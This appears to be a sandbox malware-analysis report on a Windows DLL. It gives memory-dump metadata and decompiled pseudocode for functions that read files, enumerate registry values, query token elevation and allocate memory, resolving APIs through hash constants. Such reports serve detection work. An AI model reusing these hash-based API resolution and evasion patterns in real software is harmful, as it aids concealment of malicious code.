SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6EB65D48,?,?), ref: 6EB65E5C

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction ID: ff20e21bf10a60e62751447148144ff8398a586a812ef5b2ebc6bbd290c6c7dc
Opcode Fuzzy Hash: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction Fuzzy Hash: 52F04931A1AB5179DF9159B8EC40B8B7BE8EFD1750F104E39F540A6145E6608490C269

Uniqueness

Uniqueness Score: -1.00%

Function 6EB65E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EB65E84(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6EB5C280(_t19) == 0) {
					_v12 = _a8;
					if(E6EB63064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6EB635F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6eb65e87
0x6eb65e89
0x6eb65e95
0x6eb65e9f
0x6eb65eb5
0x6eb65ed4
0x6eb65eb7
0x6eb65ec8
0x6eb65ecc
0x6eb65eec
0x6eb65ece
0x6eb65ece
0x6eb65ece
0x6eb65ecc
0x6eb65ed5
0x6eb65eda
0x6eb65ee3
0x6eb65edc
0x6eb65edc
0x6eb65ede
0x6eb65ede
0x6eb65e97
0x6eb65e97
0x6eb65e97
0x6eb65ee9

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6EB65D79,00000000,?,00000000,?), ref: 6EB65EC8

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction ID: b888d19afb993dd3ae0a673f7d47bf229286e114c6fdbfc380c261b7634672d5
Opcode Fuzzy Hash: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction Fuzzy Hash: 9BF0F93021A343EFDF91DEA9EC10AAB7FD9EF45240F104C2AE999C2141EB32D464C725

Uniqueness

Uniqueness Score: -1.00%

Function 6EB6564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EB6564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6EB63064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6EB5E644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6eb65656
0x6eb65658
0x6eb6565f
0x6eb65661
0x6eb65665
0x6eb65667
0x6eb6566a
0x6eb6566d
0x6eb6566d
0x6eb65687
0x00000000
0x00000000
0x6eb65698
0x6eb6569c
0x00000000
0x00000000
0x6eb656aa
0x6eb656ad
0x6eb656b2
0x6eb656b7
0x6eb656b7

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6EB65698

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction ID: 1d9972e61c10f666e5081428342316040901710edd01688c4f0b3204b919105b
Opcode Fuzzy Hash: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction Fuzzy Hash: 20F0C8B510130AAFE7249E9ACC54DBBBFFCDBC1B50F00892DA4D542200EA31AC54C971

Uniqueness

Uniqueness Score: -1.00%

Function 6EB61030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6EB61030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6EB6306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6EB6306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6eb6103e
0x6eb61040
0x6eb6104e
0x6eb61052
0x6eb6109b
0x00000000
0x6eb6109b
0x6eb61057
0x6eb61058
0x6eb6105a
0x6eb6105f
0x00000000
0x6eb61078
0x6eb6107c
0x6eb61089
0x6eb6108d
0x00000000
0x00000000
0x00000000
0x6eb61096

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6EB61089

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction ID: 39d02355565e823e2221825d49e2e4d10309e50a541f83a3e822a4e2c8417324
Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction Fuzzy Hash: ADF04970644683ABEE4099B89C68F7F3BADDBC1614F54CC38B644CA194EB78C9498626

Uniqueness

Uniqueness Score: -1.00%

Function 6EB63628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6EB63628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6eb6d228 == 0xa33c83e5) {
					_t7 = E6EB63064(0x60a28c5c, 0x1c6ef387);
					 *0x6eb6d22c = E6EB63064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6eb6d228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6eb6d228 = 0;
					}
				}
				_t3 = E6EB63064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6eb6d228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6eb63630
0x6eb63638
0x6eb6366b
0x6eb6367c
0x6eb63687
0x6eb63692
0x6eb63694
0x6eb63694
0x6eb63687
0x6eb63644
0x6eb6364b
0x00000000
0x6eb6364d
0x6eb6364d
0x6eb6364e
0x6eb63650
0x6eb63652
0x6eb63653
0x00000000
0x6eb63653

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6EB5DE09,?,?), ref: 6EB63692

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: f1e64a6a7552550017ff2eaa6533b0a9dd98c76e3f9d59cb1a7fa7d2bc18d027
Instruction ID: 111ed79713d6269367365d1845a8c41af7366a9a9400f1df01dd58caa6da2e24
Opcode Fuzzy Hash: f1e64a6a7552550017ff2eaa6533b0a9dd98c76e3f9d59cb1a7fa7d2bc18d027
Instruction Fuzzy Hash: 8FF02E3416A2D1BDFE6019F6FC08D569F98FFD5655F100C39F284E5100D7B08484D635

Uniqueness

Uniqueness Score: -1.00%

Function 02801000, Relevance: 1.4, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 028010FF

Memory Dump Source

Source File: 00000001.00000002.821406610.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction ID: 6c4a8b090fc6496647f7ac22f5999647c61c2d635720bed91c4606236db0180c
Opcode Fuzzy Hash: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction Fuzzy Hash: EB41F6B9E052198FDB44DFA8C494AAEBBF1FF48324F19856DE448AB340D375A840CF95

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6EB51494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6EB51494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6EB5F584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v76, E6EB5F4CC( &_v76) + 0x10);
				E6EB5F4BC( &_v80, E6EB5F4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v84, E6EB5F4CC(_t325) + 0x10);
				E6EB5F4BC( &_v88, E6EB5F4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v92, E6EB5F4CC(_t329) + 0x10);
				E6EB5F4BC( &_v96, E6EB5F4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v100, E6EB5F4CC(_t333) + 0x10);
				E6EB5F4BC( &_v104, E6EB5F4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v108, E6EB5F4CC(_t337) + 0x10);
				E6EB5F4BC( &_v112, E6EB5F4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v116, E6EB5F4CC(_t341) + 0x10);
				E6EB5F4BC( &_v120, E6EB5F4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v124, E6EB5F4CC(_t345) + 0x10);
				E6EB5F4BC( &_v128, E6EB5F4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v132, E6EB5F4CC(_t349) + 0x10);
				E6EB5F4BC( &_v136, E6EB5F4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v140, E6EB5F4CC(_t353) + 0x10);
				E6EB5F4BC( &_v144, E6EB5F4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v148, E6EB5F4CC(_t357) + 0x10);
				E6EB5F4BC( &_v152, E6EB5F4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v156, E6EB5F4CC(_t361) + 0x10);
				E6EB5F4BC( &_v160, E6EB5F4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v164, E6EB5F4CC(_t365) + 0x10);
				E6EB5F4BC( &_v168, E6EB5F4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v172, E6EB5F4CC(_t369) + 0x10);
				E6EB5F4BC( &_v176, E6EB5F4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v180, E6EB5F4CC(_t373) + 0x10);
				E6EB5F4BC( &_v184, E6EB5F4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v188, E6EB5F4CC(_t377) + 0x10);
				E6EB5F4BC( &_v192, E6EB5F4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v196, E6EB5F4CC(_t381) + 0x10);
				E6EB5F4BC( &_v200, E6EB5F4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v204, E6EB5F4CC(_t385) + 0x10);
				E6EB5F4BC( &_v208, E6EB5F4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6EB64200(0x60a28c5c, _t434);
				E6EB5F4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6EB5F4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6EB5F4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6EB5F4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6EB5F4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6EB5F4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6EB5F4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6EB5F4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6EB5F4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6EB5F4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6EB5F4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6EB5F4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6EB5F4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6EB5F4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6EB5F4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6EB5F4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6EB5F4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6EB51D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6EB5B27C( &_v248, _v256, _t481, _v252, _t318);
				E6EB5F840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v296, E6EB5F4CC(_t410) + 0x10);
				E6EB5F4BC( &_v300, E6EB5F4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v304, E6EB5F4CC(_t414) + 0x10);
				E6EB5F4BC( &_v308, E6EB5F4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v312, E6EB5F4CC(_t418) + 0x10);
				E6EB5F4BC( &_v316, E6EB5F4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6EB5F828( &_v320, E6EB5F4CC(_t422) + 0x10);
				E6EB5F4BC( &_v324, E6EB5F4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6EB5B9FC(_t154,  *_t480);
				E6EB5F4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6EB5F4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6EB5F4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6EB5F4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6EB5F654( &_v316);
				return E6EB5F654( &_v356);
			}

0x6eb51494
0x6eb51498
0x6eb5149d
0x6eb514a3
0x6eb514ab
0x6eb514b0
0x6eb514bc
0x6eb514c0
0x6eb514d2
0x6eb514e8
0x6eb514f3
0x6eb514f4
0x6eb514f5
0x6eb514f6
0x6eb514f7
0x6eb514fa
0x6eb514fe
0x6eb51502
0x6eb51509
0x6eb5151b
0x6eb51531
0x6eb5153c
0x6eb5153d
0x6eb5153e
0x6eb5153f
0x6eb51540
0x6eb51543
0x6eb51547
0x6eb5154b
0x6eb51552
0x6eb51564
0x6eb5157a
0x6eb51585
0x6eb51586
0x6eb51587
0x6eb51588
0x6eb51589
0x6eb5158c
0x6eb51590
0x6eb51594
0x6eb5159b
0x6eb515ad
0x6eb515c3
0x6eb515ce
0x6eb515cf
0x6eb515d0
0x6eb515d1
0x6eb515d2
0x6eb515d5
0x6eb515d9
0x6eb515dd
0x6eb515e4
0x6eb515f6
0x6eb5160c
0x6eb51617
0x6eb51618
0x6eb51619
0x6eb5161a
0x6eb5161b
0x6eb5161e
0x6eb51622
0x6eb51626
0x6eb5162d
0x6eb5163f
0x6eb51655
0x6eb51660
0x6eb51661
0x6eb51662
0x6eb51663
0x6eb51664
0x6eb51667
0x6eb5166b
0x6eb5166f
0x6eb51676
0x6eb51688
0x6eb5169e
0x6eb516a9
0x6eb516aa
0x6eb516ab
0x6eb516ac
0x6eb516ad
0x6eb516b0
0x6eb516b4
0x6eb516b8
0x6eb516bf
0x6eb516d1
0x6eb516e7
0x6eb516f2
0x6eb516f3
0x6eb516f4
0x6eb516f5
0x6eb516f6
0x6eb516f9
0x6eb516fd
0x6eb51701
0x6eb51708
0x6eb5171a
0x6eb51730
0x6eb5173b
0x6eb5173c
0x6eb5173d
0x6eb5173e
0x6eb5173f
0x6eb51742
0x6eb51746
0x6eb5174a
0x6eb51751
0x6eb51763
0x6eb51779
0x6eb51784
0x6eb51785
0x6eb51786
0x6eb51787
0x6eb51788
0x6eb5178b
0x6eb5178f
0x6eb51793
0x6eb5179a
0x6eb517ac
0x6eb517c2
0x6eb517cd
0x6eb517ce
0x6eb517cf
0x6eb517d0
0x6eb517d1
0x6eb517d4
0x6eb517d8
0x6eb517dc
0x6eb517e3
0x6eb517f5
0x6eb5180b
0x6eb51816
0x6eb51817
0x6eb51818
0x6eb51819
0x6eb5181a
0x6eb5181d
0x6eb51821
0x6eb51825
0x6eb5182c
0x6eb5183e
0x6eb51854
0x6eb5185f
0x6eb51860
0x6eb51861
0x6eb51862
0x6eb51863
0x6eb51866
0x6eb5186a
0x6eb5186e
0x6eb51875
0x6eb51887
0x6eb5189d
0x6eb518a8
0x6eb518a9
0x6eb518aa
0x6eb518ab
0x6eb518ac
0x6eb518af
0x6eb518b3
0x6eb518b7
0x6eb518be
0x6eb518d0
0x6eb518e6
0x6eb518f1
0x6eb518f2
0x6eb518f3
0x6eb518f4
0x6eb518f5
0x6eb518f8
0x6eb518fc
0x6eb51900
0x6eb51907
0x6eb51919
0x6eb5192f
0x6eb5193a
0x6eb5193b
0x6eb5193c
0x6eb5193d
0x6eb5193e
0x6eb51941
0x6eb51945
0x6eb51949
0x6eb51950
0x6eb51962
0x6eb51978
0x6eb51983
0x6eb51984
0x6eb51985
0x6eb51986
0x6eb5198c
0x6eb5198f
0x6eb51991
0x6eb5199c
0x6eb519a3
0x6eb519ac
0x6eb519b4
0x6eb519bb
0x6eb519c4
0x6eb519cc
0x6eb519d3
0x6eb519dc
0x6eb519e4
0x6eb519eb
0x6eb519f4
0x6eb519fc
0x6eb51a03
0x6eb51a0c
0x6eb51a14
0x6eb51a1b
0x6eb51a24
0x6eb51a2c
0x6eb51a36
0x6eb51a3f
0x6eb51a47
0x6eb51a51
0x6eb51a5a
0x6eb51a62
0x6eb51a6c
0x6eb51a75
0x6eb51a7d
0x6eb51a87
0x6eb51a90
0x6eb51a98
0x6eb51aa2
0x6eb51aab
0x6eb51ab3
0x6eb51abd
0x6eb51ac6
0x6eb51ace
0x6eb51ad8
0x6eb51ae1
0x6eb51ae9
0x6eb51af3
0x6eb51afc
0x6eb51b04
0x6eb51b0e
0x6eb51b17
0x6eb51b1f
0x6eb51b26
0x6eb51b2f
0x6eb51b37
0x6eb51b3e
0x6eb51b43
